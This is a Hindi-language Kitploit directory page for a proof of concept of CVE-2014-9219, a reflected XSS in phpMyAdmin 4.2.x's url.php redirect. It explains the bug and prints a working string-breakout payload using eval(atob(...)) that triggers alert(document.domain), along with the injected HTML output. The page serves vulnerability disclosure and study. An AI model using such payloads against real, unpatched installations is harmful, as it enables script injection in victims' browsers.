Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
उपकरण/GitHubGitHub/mohmadhafiz/cve-2014-9219
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

रिपॉजिटरी देखें
10 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2014-9219

CVE-2014-9219 XSS POC

विवरण

यह भेद्यता phpMyAdmin 4.2.x (4.2.13.1 से पहले) के url.php में रीडायरेक्शन सुविधा में इनपुट सत्यापन त्रुटि के कारण होती है, जब url पैरामीटर को प्रोसेस किया जाता है। एक दूरस्थ हमलावर पीड़ित को एक विशेष रूप से तैयार लिंक पर क्लिक करने के लिए धोखा दे सकता है और पीड़ित के ब्राउज़र में कमजोर वेबसाइट के सुरक्षा संदर्भ में मनमाना HTML और स्क्रिप्ट कोड निष्पादित कर सकता है।

प्रभावित संस्करण

phpMyAdmin: 4.2.0 - 4.2.13

समस्या

कमजोर कोड htmlspecialchars() का उपयोग करके URL पैरामीटर को सैनिटाइज़ करता है, इसे जावास्क्रिप्ट स्ट्रिंग संदर्भ में डालने से पहले:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() HTML संदर्भ के लिए डिज़ाइन किया गया है, जावास्क्रिप्ट स्ट्रिंग संदर्भ के लिए नहीं। यह उन वर्णों को पर्याप्त रूप से एस्केप नहीं करता जो जावास्क्रिप्ट स्ट्रिंग लिटरल से बाहर निकल सकते हैं।

कमिट देखें

POC

url एन्कोडेड:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
टूल डाउनलोड करें

url डिकोडेड:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

HTML आउटपुट:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.